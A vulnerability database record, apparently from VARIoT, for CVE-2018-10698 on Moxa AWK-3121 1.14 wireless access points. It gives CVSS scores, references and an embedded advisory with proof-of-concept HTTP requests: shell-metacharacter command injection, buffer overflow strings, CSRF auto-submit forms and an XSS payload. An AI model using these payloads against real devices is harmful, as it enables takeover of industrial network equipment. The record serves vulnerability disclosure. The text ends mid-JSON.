... 7e21a62f2905ca
Content-Disposition: form-data; name="bkpath"
/Troubleshooting.asp ... 7e21a62f2905ca--
[Vulnerability Type] Buffer Overflow
[Vendor of Product] Moxa
[Affected Product Code Base] AWK-3121 - 1.14
[Affected Component] Web Server -- iw_webs (Goahead)
[Attack Type] Remote
[Impact Code execution] true
[Attack Vectors] Use XSRF form to trick an admin into submitting the request and execute buffer overflow
[Reference] https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm
[Discoverer] Samuel Huntley
- It provides functionality so that an administrator can run scripts on the device to troubleshoot any issues. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_filename" is susceptible to command injection via shell metacharacters.
[Additional Information] POC
<html <body <script function submitRequest() { var formData = new FormData();
formData.append("iw_filename", ";ping -c 9 192.168.127.103 ##");
formData.append("iw_storage", "tftp");
formData.append("iw_serverip", "192.168.1.101");
formData.append("bkpath", "/wireless_cert.asp?index=1");
// HTML file input, chosen by user formData.append("certFile1", "test.txt");
// JavaScript file-like object var content = '<a id="a"<b id="b"hey!
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201906-0788",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "awk-3121",
"scope": "eq",
"trust": 1.8,
"vendor": "moxa",
"version": "1.14"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "NVD",
"id": "CVE-2018-10698"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:moxa:awk-3121_firmware:1.14:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:moxa:awk-3121:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10698"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Samuel Huntley",
"sources": [
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 0.1
},
"cve": "CVE-2018-10698",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2018-10698",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-120483",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-10698",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10698",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-326",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-120483",
"trust": 0.1,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-10698",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120483"
},
{
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-326"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. The device enables an unencrypted TELNET service by default. This allows an attacker who has been able to gain an MITM position to easily sniff the traffic between the device and the user. Also an attacker can easily connect to the TELNET daemon using the default credentials if they have not been changed by the user. Moxa AWK-3121 The device contains vulnerabilities related to certificate and password management.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. A trust management issue vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the lack of an effective trust management mechanism in network systems or products. Attackers can use default passwords or hard-coded passwords, hard-coded certificates, etc. to attack affected components. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). However, the same functionality allows an attacker to download\n the file without any authentication or authorization. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n It provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n However, the same functionality allows an attacker to execute commands\n on the device. The POST parameter \"srvName\" is susceptible to a buffer\n overflow. By crafting a packet that contains a string of\n 516 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n It provides alert functionality so that an\n administrator can send emails to his/her account when there are\n changes to the device\u0027s network. However, the same functionality allows\n an attacker to execute commands on the device. The POST parameters\n \"to1,to2,to3,to4\" are all susceptible to buffer overflow. By crafting\n a packet that contains a string of 678 characters, it is\n possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. However, this interface is not protected against\n CSRF attacks, which allows an attacker to trick an administrator into\n executing actions without his/her knowledge, as demonstrated by the forms/iw_webSetParameters and\n forms/webSetMainRestart URIs. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n However, the same functionality allows an attacker to execute commands\n on the device. The POST parameter \"srvName\" is susceptible to this\n injection. By crafting a packet that contains shell metacharacters,\n it is possible for an attacker to\n execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. However, the same functionality allows an attacker\n to execute commands on the device. The POST parameter \"iw_privatePass\"\n is susceptible to this injection. By crafting a packet that contains shell metacharacters,\n it is possible\n for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. It\n provides functionality so that an administrator can change the\n name of the device. However, the same functionality allows an attacker\n to execute XSS by injecting an XSS payload. The POST parameter\n \"iw_board_deviceName\" is susceptible to this injection. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_filename\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 162 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_filename\" is susceptible to command\n injection via shell metacharacters. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n It provides functionality so that an administrator\n can run scripts on the device to troubleshoot any issues. However,\n the same functionality allows an attacker to execute commands on the\n device. The POST parameter \"iw_serverip\" is susceptible to buffer\n overflow. By crafting a packet that contains a string of\n 480 characters, it is possible for an attacker to execute the attack. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10698"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015591"
},
{
"db": "VULHUB",
"id": "VHN-120483"
},
{
"db": "VULMON",
"id": "CVE-2018-10698"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10698",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
